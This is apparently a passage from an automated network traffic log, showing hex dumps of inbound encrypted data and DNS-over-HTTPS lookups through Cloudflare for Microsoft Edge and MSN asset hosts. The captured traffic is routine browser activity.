T#]gLUZ@w\{Nzfn:rtr=
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 bd Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb 4c Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGWL
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd bf Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 30 Data Ascii: =+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v0
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 fa Data Ascii: K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 0f Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 8f Data Ascii: aW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2025-01-15 19:16:34 UTC	1390	IN	Data Raw: 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 20 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:35 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-15 19:16:35 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 55 00 0c 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: assetsmsncom)UQ
2025-01-15 19:16:35 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 15 Jan 2025 19:16:35 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 90283378bef8c3ee-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:16:35 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 0b 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 54 51 00 1c 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 07 65 64 67 65 6b 65 79 03 6e 65 74 00 c0 2c 00 05 00 01 00 00 03 75 00 16 06 65 32 38 35 37 38 01 64 0a 61 6b 61 6d 61 69 65 64 67 65 c0 43 c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 1d c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 1f c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 21 c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 18 c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 14 c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 07 c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 1b c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 08 c0 54 00 01 00 01 00 00 00 05 00 04 17 31 fb 16 00 00 29 04 d0 Data Ascii: assetsmsncomTQassetsmsncomedgekeynet,ue28578dakamaiedgeCT1T1T1!T1T1T1T1T1T1)

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:36 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-15 19:16:36 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 45 00 0c 00 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgeassetserviceazureedgenet)EA
2025-01-15 19:16:36 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 15 Jan 2025 19:16:36 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 90283380bb7f5e73-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:16:36 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 05 00 00 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 c0 0c 00 05 00 01 00 00 06 23 00 17 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 03 61 66 64 c0 1d c0 3c 00 05 00 01 00 00 0d 2b 00 22 10 61 7a 75 72 65 65 64 67 65 2d 74 2d 70 72 6f 64 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 c0 27 c0 5f 00 05 00 01 00 00 00 2a 00 2c 04 73 68 65 64 08 64 75 61 6c 2d 6c 6f 77 0b 73 2d 70 61 72 74 2d 30 30 31 32 06 74 2d 30 30 30 39 08 74 2d 6d 73 65 64 67 65 c0 27 c0 8d 00 05 00 01 00 00 00 2a 00 02 c0 9b c0 9b 00 01 00 01 00 00 00 2a 00 04 0d 6b f6 28 00 00 29 04 d0 00 00 00 00 00 f2 00 0c 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgeassetserviceazureedgenet#edgeassetserviceafd<+"azureedge-t-prodtrafficmanager'_,sheddual-lows-part-0012t-0009t-msedge'*k()

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-15 19:16:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcom)QM
2025-01-15 19:16:37 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 15 Jan 2025 19:16:37 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 9028338599dc4271-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:16:37 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 04 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0d ee 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 30 00 05 00 01 00 00 00 ce 00 18 0b 64 75 61 6c 2d 61 2d 30 30 33 36 09 64 63 2d 6d 73 65 64 67 65 c0 58 c0 69 00 01 00 01 00 00 00 ce 00 04 0d 6b 16 ef c0 69 00 01 00 01 00 00 00 ce 00 04 83 fd 21 ef 00 00 29 04 d0 00 00 00 00 01 28 00 0c 01 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcom-edge-microsoft-comdual-a-0036a-msedgenet0dual-a-0036dc-msedgeXiki!)($